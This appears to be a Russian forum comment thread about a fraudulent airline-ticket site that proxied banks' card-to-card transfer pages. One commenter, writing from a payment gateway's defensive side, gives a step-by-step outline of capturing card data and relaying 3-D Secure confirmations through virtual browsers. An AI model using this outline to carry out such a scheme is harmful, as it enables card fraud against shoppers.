30.09.2016 16:34+3Вернуть все платежи, кроме первого – достаточно реально. Эти операции не подтверждались с помощью 3-D Secure, и не являются повторными платежами для какой-то предыдущей покупки, подтвержденной по 3-D Secure.
Вопрос мошенников, которые делают переводы с карты на карту под видом оплаты за авиабилеты, гораздо сложнее. Выше тут уже детально всё обсудили, но в сухом остатке – доказать что-то банку-эмитенту будет очень сложно. Для него вы сами совершенно сознательно перевели деньги на чью-то карту (на которой уже нет денег, и которая зарегистрирована на подставное лицо), и подтвердили эту операцию одноразовым кодом. Теоретически, тут что-то могут сделать правоохранительные органы.
Мы являемся платёжным шлюзом (и даже сами сталкивались с такой проблемой), поэтому в основном тут будет описано происходящее с нашей стороны.
Бороться с мошенниками на стороне платёжных шлюзов, по сути, очень сложно; лучшая тактика тут пытаться сделать использование нашей формы сложнее, чем у других (известный анекдот – для того, чтобы выжить при встрече со львом, не надо уметь бежать быстрее льва; достаточно бежать быстрее соседа).
С учётом того, что каждый платёж достаточно большой – мошенник может позволить потратить себе достаточно много денег на организацию этого платежа. Можно действовать как-то так:
1) На каждого посетителя сайта (точнее, платёжной формы с кнопкой «оплатить») автоматически поднимаем новую виртуалку в облаке или в ботнете, в ней браузером заходим на страницу перевода с карты на карту платёжного шлюза. Для платёжного шлюза это выглядит как обычный запрос обычного пользователя;
2) Спрашиваем у посетителя номер карты, срок действия, CVV;
3) Вводим в виртуальном браузере эти данные; вводим данные карты получателя (мошенника);
4) Если, например, страница перевода с карты на карту требует разгадать капчу – показываем её посетителю и заставляем разгадать.
5) Отправляем в виртуальном браузере форму, получаем в ответ переадресацию на сайт банка-эмитента для прохождения 3-D Secure. Перехватываем эту переадресацию, и переадресуем туда реального посетителя в реальном браузере (передавая при этом TermUrl своего сайта с авиабилетами).
6) У посетителя отображается настоящая страница банка-эмитента (с соответствующим адресом и сертификатами), он вводит на ней одноразовый пароль из SMS, отправляет; банк-эмитент возвращает его на сайт с авиабилетами.
7) Информацию о подтверждении 3DS, пришедшую на сайт с авиабилетами – опять же, отправляем в виртуальный браузер. Всё, операция проведена.
По сути, для платёжного шлюза в этой ситуации всё выглядит так, что к нему пришёл реальный человек (на самом деле мошенник), который ввёл в форму переводов с карты на карту данные карты отправителя, данные карты получателя, и подтвердил операцию одноразовым паролем в банке-эмитенте. Отличить мошенника от честного человека тут не получится – нет никаких данных, которые выделяли бы мошенника.
Именно по этой причине мы приняли решение отключить форму перевода платежей с карты на карты в нашей системе.
Какая-то системная борьба (а не просто закрытие сайтов после того, как они уже успели набрать много денег) может идти только со стороны банков-эмитентов – как карт отправителей, так и карт получателей.
От эмитентов карт отправителей хотелось бы видеть на странице подтверждения платежа заметное указание на то, что осуществляется именно перевод с карты на карту. Кроме того, так как со страницей подтверждения платежа мошенник может поступить так же, как со страницей перевода – «проксировать» её для пользователя в виртуальном браузере; это потребует большей невнимательности со стороны пользователя, но хотелось бы ещё чтобы банки, отправляющие одноразовые коды в SMS-сообщениях, предупреждали о переводе и в тексте сообщения. На вашем примере – в SMS-сообщении написано «P2P», среднему пользователю это ни о чём не говорит.
От эмитентов карт получателей – запрет на получение денег для карт с не подтверждённой личностью владельца (для виртуальных карт типа яндекс.денег и киви).
А пользователям стоит внимательнее следить за тем, где они вводят данные карты. Как уже было сказано, если на странице для ввода номера карты есть сертификат EV – то, по крайней мере, это не аноним и не однодневка; в случае чего хотя бы будет понятно, на какую организацию писать заявление. Да и мошенникам постоянно регистрировать новые компании и получать сертификаты EV будет затруднительно; это может сделать такое мошенничество невыгодным.
Советы же вида «если левый ОГРН – то это мошенники», «если нет номера телефона – то это мошенники» и т.п. действуют как советы «если письмо написано с грамматическими ошибками – то это фишинг». Т.е. действует только до тех пор, пока мошенники могут себе позволить не напрягаться и писать неграмотные письма. Как только все узнают об этих советах – мошенники сразу начнут писать фишинговые письма грамотно, а на сайтах начнут указывать реальные правдоподобные ОГРН и телефоны.black_semargl
01.10.2016 17:43Насчёт «не являются повторными» есть большой вопрос — сумма платежа кратная.
Speakus
01.10.2016 18:46Никакого вопроса. Первый и последующий платежи на разные сервисы отправлен (первый в карту, последующие — продавцу).
black_semargl
01.10.2016 20:26Первый — на карту мошенника, остальные — на счёт YM мошенника.
Так как механизм повторных снятий не раскрыт (собственно пострадавший его и не знает) — то связь этих тоже неизвестна.
Но известно, что YM позволяет выпустить привязанную к счёту карту.
ЗЫ: Сегодня покупал на алиэкспрессе — списало с YM без каких-либо кодов и паролей, просто ОК на страничке нажал.
Speakus
01.10.2016 19:02Если нужны подробности, обращайтесь к пользователю Vad_R
Пользователь read-only — т.о. написать в личку ему возможности нету. Почему не обратился в прокуратуру? Можно ещё обратится в генеральную прокуратуру.
xbox
01.10.2016 21:54+1Пользователь read-only — т.о. написать в личку ему возможности нету.
Этот пользователь мне как-то пишет в личку и я ему отвечаю.
Я не хотел бы быть промежуточным звеном в переписке с Vad_R. Если есть вопросы, желательно к нему напрямую обращаться. Мы с ним через хабропочту познакомились несколько дней назад, поэтому дополнительной информации по его случаю у меня нет. По основному случаю, описываемому в публикации, готов ответить, если возникнут вопросы, — с тем человеком я хорошо знаком и общаюсь лично.
Я попробовал на одном из read-only аккаунтов, — начать диалог с такими аккаунтами можно. Запрета нет. Единственное, что может быть кнопки нет удобной или ссылки для того, чтобы им написать. Но адрес страницы для начала диалога можно легко вычислить по аналогии с остальными беседами.
https://geektimes.ru/conversations/Vad_R/
(Может это не фича, а баг, но у меня так работает. Если любое имя пользователя, включая read only, подставить в таком адресе, то начинается диалог.)
MaximChistov
Сурово, однако. Думал все эти card2card не дают себя в фрейме открывать…
geisha
Вы хоть читали? Там фреймов нету, есть клиент-серверная прокладка.
izzholtik
Я так и не понял, зачем вообще что-то куда-то встраивать, если можно тупо украсть код и «на той стороне» всё отправить?
Вообще, это банальный фишинг, щедро приправленный бестолковой защитой карты. Печально всё это.
geisha
«Я так и не понял, зачем вообще что-то куда-то встраивать, если можно тупо украсть код и «на той стороне» всё отправить?»
Это мне вопрос? Думаю, чтобы не замарачиваться с подменой IP при множественных переводах с разных карт на одну.
xbox
На карту, видимо, без подтверждения 3D Secure проблематично отправить, если вообще возможно. Покупатель сам вводит код подтверждения. Иногда по несколько раз. И после человек может в течение нескольких дней даже не подозревать, что его обманули. Если дополнительная активность по карте не проявится, то покупатель авиабилетов может узнать о мошеннических действиях со своей картой даже в аэропорту. Чем быстрее жертва мошенников заявит в свой банк, тем больше шансов аннулировать транзакцию и, возможно, даже найти следы мошенников. А через неделю шансы что-то найти и вернуть снижаются очень сильно.
И еще, если кто-то перехватил данные карты, чтобы перевести деньги на другую карту, ему нужно с какого-то компьютера выходить в сеть, набивать намера итп. При массовых переводах скорее всего останутся следы. А если покупатель сам перевод осуществляет, то в логах платежных систем ничего нет, — IP мошенников нигде не записываются. Единственная зацепка — это веб сайт мошенников.
Один раз автоматизировал все — и пошел отдыхать.
Возможно в этом причина.
geisha
«если кто-то перехватил данные карты, чтобы перевести деньги на другую карту, ему нужно с какого-то компьютера выходить в сеть, набивать намера итп.»
Лично я понял из того, что вы написали в статье что именно так они и делали. Автоматизированная часть воровства заключалась только в первой транзакции, которая финансировала рекламную кампанию. Все остальное — вручную.
black_semargl
Судя по сумме — активировали какой-то автоплатёж. Возможно — сразу при транзакции.
xbox
Возможно, это и так. Только наоборот. Первая часть перевод на карту (т.е. себе в карман), а уже вторая и последующие часть на рекламную компанию. На рекламную компанию средств тратится больше, чем на вывод на карты. Причем ручная это работа во второй части или автоматизированная, тоже не известно. По крайней мере на частично автоматизированную похожа.
Пока остатка хватало, списания были с интервалом ровно в 10 минут. А как точно заметил Stryker86 в одном из комментариев, суммы списания кратны изначальной сумме 5900 р (11800, 17700, 23600). Совпадение? Не думаю.
lexore
> тупо украсть код
Если вы про код из смс, то он одноразовый и высылается по смс только после заполнения всех форм и нажатия кнопки «ок».
Его нельзя украсть, его можно только обманом узнать у пользователя.
Sioln
geisha
«Но в итоге браузер шлёт запрос серверу Тинькова?»
Думаю, да. Там ведь куча скриптов от оригинальной страницы p2p перевода. Зачем еще тебе нужны чужие работающие скрипты?
«И у запроса можно проверить referrer.»
Вас хоть сколько-нибудь удивит если в этой истории окажется, что они НЕ проверяют referrer?
Greendq
referrer заполняется отсылающей стороной, сервер его получает в готовом виде от клиента. Подделывается легко.
ValdikSS
В итоге сервер злоумышленника шлет запрос серверу Тинькова.
Slihs
Вы невнимательно читали статью.
Slihs
Да и ни один современный браузер не даст джаваскрипту изменять код в iframe стороннего сайта (напр. вписать номер карты получателя), даже при отсутствии заголовка X-Frame-Options, только ввод самого пользователя. SOP однако…
ValdikSS
Они и не дают. Эти халтурщики даже поленились распарсить страницу с сайта Тинькова и отдавать клиенту только необходимые данные, а, видимо, просто регулярным выражением добавляют
display: noneв необходимые блоки.handicraftsman
Они даже поленились поставить препроцессор на стороне сервера. Всё на стороне клиента происходит.
Slihs
Я думаю это скорее реклама AdBlock. Или еще один повод вырезать Яндекс.Директ…
Сори, веткой ошибся…